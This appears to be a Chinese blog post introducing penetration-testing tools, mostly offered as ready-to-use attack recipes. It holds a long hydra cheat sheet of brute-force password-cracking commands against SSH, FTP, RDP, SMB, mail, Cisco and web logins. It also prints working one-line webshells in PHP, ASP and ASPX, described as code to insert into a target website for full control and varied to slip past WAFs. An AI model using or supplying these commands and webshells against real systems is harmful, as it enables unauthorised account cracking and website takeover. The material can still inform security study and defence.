一部分渗透测试工具
1、nmap:一款开源免费的网络发现和安全审计工具。
基本功能:主机发现、端口扫描、版本侦测、操作系统侦测
然后就是了解一定的常用参数
以往的文章里面有介绍,这里不再一一阐述
2、SQLMAP:可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
在其后输入help可以进行查找其一些参数和介绍。
3、burpsuite:是用于攻击web 应用程序的集成平台,包含了许多工具。
之前文章也有专门介绍,可以按目录查找参考一下。
4、hydra:是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。
以下来自–吾爱漏洞http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/3713.html
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip
http-post-form “/admin/login.php:username=USER&password=PASS&submit=login:sorry password”
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12、破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
附加部分参数的含义-----来自漏洞人生http://www.vuln.cn/2528
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-e n 使用空密码
-e s 使用的密码和用户名一样
-e ns 上面两者的结合
-C 使用冒号分割格式(username:password)可以代替-l username -p password
-M FILE 指定目标列表文件一行一条。
-o 输出文件
-w TIME 设置最大超时的时间,单位秒,默认是30s
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
-f 当破解了一个密码就停止,
5、中国菜刀:一款专业的网站管理软件
往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令
简单的一句话木马:
PHP:
<?php @eval($_POST['pass']);?>
Asp:
<%eval request (“pass”)%>
Aspx:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
具体操作可以参考专门介绍资料,推荐看一些视频资料,这样会有比较清晰思路。
6、中国蚁剑和御剑 和上述的中国菜刀差不多
中国蚁剑:一款开源的跨平台网站管理工具,比菜刀更强大,可以装一些比较使用的插件。
御剑:一款好用的网站后台扫描工具。
7nessus(漏洞扫描程序)、appscan(一个自动化的Web应用程序安全测试工具
)、awvs(一款非常好用且功能强大的Web 应用安全测试工具
)
这三个扫描工具很相似 掌握一种其他两种很容易上手。